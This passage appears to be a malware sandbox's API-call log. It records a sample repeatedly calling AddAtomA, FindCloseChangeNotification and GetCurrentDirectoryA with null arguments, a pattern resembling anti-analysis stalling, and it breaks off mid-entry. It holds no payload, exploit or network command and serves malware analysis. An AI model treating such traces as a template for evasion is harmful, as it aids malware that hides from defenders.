[0080.493] AddAtomA (lpString=0x0) returned 0x0 [0080.493] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.493] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.494] AddAtomA (lpString=0x0) returned 0x0 [0080.494] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.494] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.494] AddAtomA (lpString=0x0) returned 0x0 [0080.494] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.494] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.494] AddAtomA (lpString=0x0) returned 0x0 [0080.494] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.494] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.494] AddAtomA (lpString=0x0) returned 0x0 [0080.494] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.494] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.494] AddAtomA (lpString=0x0) returned 0x0 [0080.494] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.495] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.495] AddAtomA (lpString=0x0) returned 0x0 [0080.495] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.495] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.495] AddAtomA (lpString=0x0) returned 0x0 [0080.495] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.495] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.495] AddAtomA (lpString=0x0) returned 0x0 [0080.495] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.495] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.495] AddAtomA (lpString=0x0) returned 0x0 [0080.495] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.495] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.495] AddAtomA (lpString=0x0) returned 0x0 [0080.495] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.496] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.496] AddAtomA (lpString=0x0) returned 0x0 [0080.496] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.496] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.496] AddAtomA (lpString=0x0) returned 0x0 [0080.496] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.496] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.496] AddAtomA (lpString=0x0) returned 0x0 [0080.496] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.496] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.496] AddAtomA (lpString=0x0) returned 0x0 [0080.496] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.496] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.496] AddAtomA (lpString=0x0) returned 0x0 [0080.496] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.497] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.497] AddAtomA (lpString=0x0) returned 0x0 [0080.497] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.497] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.497] AddAtomA (lpString=0x0) returned 0x0 [0080.497] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.497] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.497] AddAtomA (lpString=0x0) returned 0x0 [0080.497] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.497] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.497] AddAtomA (lpString=0x0) returned 0x0 [0080.497] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.497] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.497] AddAtomA (lpString=0x0) returned 0x0 [0080.497] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.498] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.498] AddAtomA (lpString=0x0) returned 0x0 [0080.498] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.498] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.498] AddAtomA (lpString=0x0) returned 0x0 [0080.498] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.498] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.498] AddAtomA (lpString=0x0) returned 0x0 [0080.498] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.498] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.498] AddAtomA (lpString=0x0) returned 0x0 [0080.498] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.498] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.498] AddAtomA (lpString=0x0) returned 0x0 [0080.498] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.498] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.499] AddAtomA (lpString=0x0) returned 0x0 [0080.499] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.499] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.499] AddAtomA (lpString=0x0) returned 0x0 [0080.499] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.499] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.499] AddAtomA (lpString=0x0) returned 0x0 [0080.499] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.499] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.499] AddAtomA (lpString=0x0) returned 0x0 [0080.499] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.499] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.499] AddAtomA (lpString=0x0) returned 0x0 [0080.499] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.499] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.499] AddAtomA (lpString=0x0) returned 0x0 [0080.499] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.499] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.499] AddAtomA (lpString=0x0) returned 0x0 [0080.499] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.499] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.500] AddAtomA (lpString=0x0) returned 0x0 [0080.500] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.500] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.500] AddAtomA (lpString=0x0) returned 0x0 [0080.500] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.500] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.500] AddAtomA (lpString=0x0) returned 0x0 [0080.500] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.500] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.500] AddAtomA (lpString=0x0) returned 0x0 [0080.500] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.500] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.500] AddAtomA (lpString=0x0) returned 0x0 [0080.500] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.500] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.500] AddAtomA (lpString=0x0) returned 0x0 [0080.500] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.500] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.500] AddAtomA (lpString=0x0) returned 0x0 [0080.500] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.501] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.501] AddAtomA (lpString=0x0) returned 0x0 [0080.501] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.501] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.501] AddAtomA (lpString=0x0) returned 0x0 [0080.501] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.501] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.501] AddAtomA (lpString=0x0) returned 0x0 [0080.501] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.501] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.501] AddAtomA (lpString=0x0) returned 0x0 [0080.501] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.501] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.501] AddAtomA (lpString=0x0) returned 0x0 [0080.501] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.501] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.502] AddAtomA (lpString=0x0) returned 0x0 [0080.502] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.502] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.502] AddAtomA (lpString=0x0) returned 0x0 [0080.502] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.502] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.502] AddAtomA (lpString=0x0) returned 0x0 [0080.502] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.502] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.502] AddAtomA (lpString=0x0) returned 0x0 [0080.502] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.502] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.502] AddAtomA (lpString=0x0) returned 0x0 [0080.502] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.502] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.502] AddAtomA (lpString=0x0) returned 0x0 [0080.502] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.502] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.503] AddAtomA (lpString=0x0) returned 0x0 [0080.503] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.503] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.503] AddAtomA (lpString=0x0) returned 0x0 [0080.503] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.503] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.503] AddAtomA (lpString=0x0) returned 0x0 [0080.503] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.503] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.503] AddAtomA (lpString=0x0) returned 0x0 [0080.503] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.503] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.503] AddAtomA (lpString=0x0) returned 0x0 [0080.503] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.503] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.503] AddAtomA (lpString=0x0) returned 0x0 [0080.503] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.504] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.504] AddAtomA (lpString=0x0) returned 0x0 [0080.504] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.504] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.504] AddAtomA (lpString=0x0) returned 0x0 [0080.504] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.504] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.504] AddAtomA (lpString=0x0) returned 0x0 [0080.504] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.505] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.505] AddAtomA (lpString=0x0) returned 0x0 [0080.505] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.505] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.505] AddAtomA (lpString=0x0) returned 0x0 [0080.505] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.505] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.505] AddAtomA (lpString=0x0) returned 0x0 [0080.505] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.505] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.505] AddAtomA (lpString=0x0) returned 0x0 [0080.505] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.505] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.505] AddAtomA (lpString=0x0) returned 0x0 [0080.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.506] AddAtomA (lpString=0x0) returned 0x0 [0080.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.506] AddAtomA (lpString=0x0) returned 0x0 [0080.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.506] AddAtomA (lpString=0x0) returned 0x0 [0080.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.506] AddAtomA (lpString=0x0) returned 0x0 [0080.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.506] AddAtomA (lpString=0x0) returned 0x0 [0080.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.507] AddAtomA (lpString=0x0) returned 0x0 [0080.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.507] AddAtomA (lpString=0x0) returned 0x0 [0080.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.507] AddAtomA (lpString=0x0) returned 0x0 [0080.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.507] AddAtomA (lpString=0x0) returned 0x0 [0080.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.507] AddAtomA (lpString=0x0) returned 0x0 [0080.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.507] AddAtomA (lpString=0x0) returned 0x0 [0080.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.508] AddAtomA (lpString=0x0) returned 0x0 [0080.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.508] AddAtomA (lpString=0x0) returned 0x0 [0080.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.508] AddAtomA (lpString=0x0) returned 0x0 [0080.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.508] AddAtomA (lpString=0x0) returned 0x0 [0080.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.508] AddAtomA (lpString=0x0) returned 0x0 [0080.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.508] AddAtomA (lpString=0x0) returned 0x0 [0080.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.509] AddAtomA (lpString=0x0) returned 0x0 [0080.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.509] AddAtomA (lpString=0x0) returned 0x0 [0080.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.509] AddAtomA (lpString=0x0) returned 0x0 [0080.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.509] AddAtomA (lpString=0x0) returned 0x0 [0080.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.509] AddAtomA (lpString=0x0) returned 0x0 [0080.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.509] AddAtomA (lpString=0x0) returned 0x0 [0080.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.510] AddAtomA (lpString=0x0) returned 0x0 [0080.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.510] AddAtomA (lpString=0x0) returned 0x0 [0080.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.510] AddAtomA (lpString=0x0) returned 0x0 [0080.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.510] AddAtomA (lpString=0x0) returned 0x0 [0080.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.510] AddAtomA (lpString=0x0) returned 0x0 [0080.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.510] AddAtomA (lpString=0x0) returned 0x0 [0080.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.511] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.511] AddAtomA (lpString=0x0) returned 0x0 [0080.511] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.511] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.511] AddAtomA (lpString=0x0) returned 0x0 [0080.511] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.511] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.511] AddAtomA (lpString=0x0) returned 0x0 [0080.511] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.511] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.511] AddAtomA (lpString=0x0) returned 0x0 [0080.511] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.511] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.511] AddAtomA (lpString=0x0) returned 0x0 [0080.511] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.511] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.511] AddAtomA (lpString=0x0) returned 0x0 [0080.511] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.511] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.511] AddAtomA (lpString=0x0) returned 0x0 [0080.511] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.512] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.512] AddAtomA (lpString=0x0) returned 0x0 [0080.576] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.578] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.578] AddAtomA (lpString=0x0) returned 0x0 [0080.578] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.578] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.578] AddAtomA (lpString=0x0) returned 0x0 [0080.578] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.579] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.579] AddAtomA (lpString=0x0) returned 0x0 [0080.579] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.579] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.579] AddAtomA (lpString=0x0) returned 0x0 [0080.579] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.579] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.579] AddAtomA (lpString=0x0) returned 0x0 [0080.579] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.580] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.580] AddAtomA (lpString=0x0) returned 0x0 [0080.580] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.580] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.580] AddAtomA (lpString=0x0) returned 0x0 [0080.580] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.580] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.580] AddAtomA (lpString=0x0) returned 0x0 [0080.580] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.581] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.581] AddAtomA (lpString=0x0) returned 0x0 [0080.581] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.581] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0080.581] AddAtomA (lpString=0x0) returned 0x0 [0080.581] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0080.581] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: 